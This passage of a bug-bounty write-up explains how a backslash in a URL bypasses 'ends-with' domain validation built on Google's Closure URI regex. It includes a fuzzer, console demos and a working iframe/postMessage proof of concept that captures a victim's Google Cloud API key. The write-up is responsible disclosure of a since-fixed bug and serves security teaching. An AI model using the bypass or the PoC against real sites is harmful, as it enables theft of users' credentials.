           "https", "user:pass", "test.corp.google.com", "8080", "/path/to/something", "param=value", "hash" ]

Alright, so domainURL.match(magicRegex)[3] is the authority (domain). Again, I usually would have given up at this point; not sure why I continued. But I wanted to dig deeper and look at this regex.

I put this regex into www.debuggex.com. This is a really cool website; it visualises the regex, and you can play with it in real time and see how the matching happens.

The Image Generated by Debuggex

I wanted to figure out what makes the regex think that the authority is over and that the port/path is coming; in other words, what “ends the authority”.

If we zoom in, we can see that this is the part we are looking for:

Zoomed Image Generated by Debuggex

So, the authority ends with /, ? or #, and anything after is not the domain name anymore. All of those are valid; they do “end” the domain. But I had this idea: what if there is something else? We need a character that, when parsed by the browser, ends the authority, but when parsed by this regex, does not. This would allow us to bypass the check, since we could craft a URL whose regex-parsed authority ends in, for example, .corp.google.com.

Like this:

https://xdavidhu.me[MAGIC_CHARACTER]test.corp.google.com

So, for the browser, the authority is xdavidhu.me, but for the regex, the authority is the whole thing, which ends in .corp.google.com, so the API key postMessage is allowed to be sent.

I started to look at HTTP / URL specifications, all of which are really interesting, and I encourage you to explore these “lower-level” things as well. I didn’t quite find what I wanted there, but what I ended up doing, and what worked, was writing a little JavaScript fuzzer to test what ends the authority in an actual browser:

var s = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~';

for (var i = 0; i < s.length; i++) {
  char = s.charAt(i);
  string = 'https://xdavidhu.me'+char+'.corp.google.com';
  try {
    const url = new URL(string);
    console.log("[+] " + string + " -> " + url.hostname);
  } catch {
    console.log("[!] " + string + " -> ERROR");
  }
}

As you can see, this script loops through the string s, puts each character one-by-one in the middle of the URL, parses the URL, and prints the authority.

Besides many “negative” results, it produced 4 “positive” results: it found 4 characters that ended the authority:

[+] https://xdavidhu.me/.corp.google.com -> xdavidhu.me
[+] https://xdavidhu.me?.corp.google.com -> xdavidhu.me
[+] https://xdavidhu.me#.corp.google.com -> xdavidhu.me
[+] https://xdavidhu.me\.corp.google.com -> xdavidhu.me

This is just what we needed!

In the browser, besides /, ? and #, \ also ends the authority!

I tested it in the 3 major browsers I had on hand (Firefox, Chrome, Safari), and all of them had the same result.
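Worth noting: this backslash handling is a WHATWG-browser behaviour. RFC-3986-style parsers, such as Python's urllib (used here only as a convenient illustration; it is not part of the original bug), keep the backslash inside the authority, which is exactly the kind of parser differential this bug exploits:

```python
from urllib.parse import urlsplit

# RFC-3986-style parsers do not treat "\" as an authority terminator,
# unlike WHATWG-compliant browsers, which stop the host at the backslash
# and see only "xdavidhu.me".
parts = urlsplit("https://xdavidhu.me\\test.corp.google.com")
print(parts.netloc)  # xdavidhu.me\test.corp.google.com
```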

After this, I found the source of this behaviour in Chromium’s source code:

bool IsAuthorityTerminator(base::char16 ch) {
  return IsURLSlash(ch) || ch == '?' || ch == '#';
}

And the IsURLSlash function:

inline bool IsURLSlash(base::char16 ch) {
  return ch == '/' || ch == '\\';
}

Again, I was always “afraid” to dig this deep, and would never have thought about looking into the source code of a browser, but after browsing around a bit, you realise that this code is also just code, and you can understand how it works. This is super interesting and can be really helpful in many situations. I could have just looked into the source code to find this bug, skipping the whole fuzzer part.

Using this bug, we can demo the exploit in the JS Console:

// Regex parsing
"https://user:pass@xdavidhu.me\\test.corp.google.com:8080/path/to/something?param=value#hash".match(magicRegex)

Array(8) [ "https://user:pass@xdavidhu.me\\test.corp.google.com:8080/path/to/something?param=value#hash",
           "https", "user:pass", "xdavidhu.me\\test.corp.google.com", "8080", "/path/to/something", "param=value", "hash" ]

// Browser parsing
new URL("https://user:pass@xdavidhu.me\\test.corp.google.com:8080/path/to/something?param=value#hash")

URL { href: "https://user:pass@xdavidhu.me/test.corp.google.com:8080/path/to/something?param=value#hash",
      origin: "https://xdavidhu.me", protocol: "https:", username: "user", password: "pass", host: "xdavidhu.me",
      hostname: "xdavidhu.me", port: "", pathname: "/test.corp.google.com:8080/path/to/something", search: "?param=value" }

We can see that this works as we wanted it to, so we can make a POC which will embed henhouse and grab the victim’s API key.

<iframe id="test" src='https://console.developers.google.com/henhouse/?pb=["hh-0","gmail",null,[],"https://xdavidhu.me\\test.corp.google.com",null,[],null,"Create API key",0,null,[],false,false,null,null,null,null,false,null,false,false,null,null,null,null,null,"Quickstart",true,"Quickstart",null,null,false]'></iframe>

<script>
window.addEventListener('message', function (d) {
  console.log(d.data);
  if(d.data[1] == "apikey-credential"){
    var h1 = document.createElement('h1');
    h1.innerHTML = "Your API key: " + d.data[2];
    document.body.appendChild(h1);
  }
});
</script>

Here is the POC video I sent to Google which shows this in action:

At this point, I had mixed feelings about this, since it had quite a low impact. You could only “steal” API keys or OAuth Client IDs. Client IDs without the secrets are meh, and if you wanted to generate an API key for an API that was paid (with required billing), it required user interaction. So essentially this was a pretty low/medium impact bug.

Then I had this thought: this regex looks way too complex to have been created exclusively for henhouse.

I started grepping JS files in other Google products, and yep, this regex was everywhere. I found this regex in the Google Cloud Console’s JS, the Google Actions Console’s JS, in YouTube Studio, in myaccount.google.com (!), and even in some Google Android apps.

A day later I even found this line in the Google Corp Login Page (login.corp.google.com):

var goog$uri$utils$splitRe_ = [THE_MAGIC_REGEX],

After this, I was sure this was something bigger than just henhouse. Anywhere this regex is used to do domain validation with similar “ends-with” logic, it can be bypassed with the \ character.

Two days after reporting, I got this response:

The Triage Message

A few weeks later, I was watching LiveOverflow’s ‘XSS on Google Search’ video, where he mentioned that “But Google’s JavaScript code is actually Open Source!”. And then he showed “Google’s common JavaScript library”, the Closure library.

I immediately was like: “Wait a minute, did I find a bug in this library?”

I quickly opened the Closure library GitHub repo and looked at the commits. And this is what I found:

The Commit in the Closure Library

With this change:

The Content of the Commit

That is me! :D

So this was the story of me trying to bypass a small app’s URL validation and accidentally finding a bug in Google’s common JavaScript library! I hope you enjoyed it!

You can follow me on Twitter: @xdavidhu

Timeline:

[Jan 04, 2020] - Bug reported
[Jan 06, 2020] - Initial triage
[Jan 06, 2020] - Bug accepted (P4 -> P1)
[Jan 17, 2020] - Reward of $6000 issued
[Mar 06, 2020] - Bug fixed
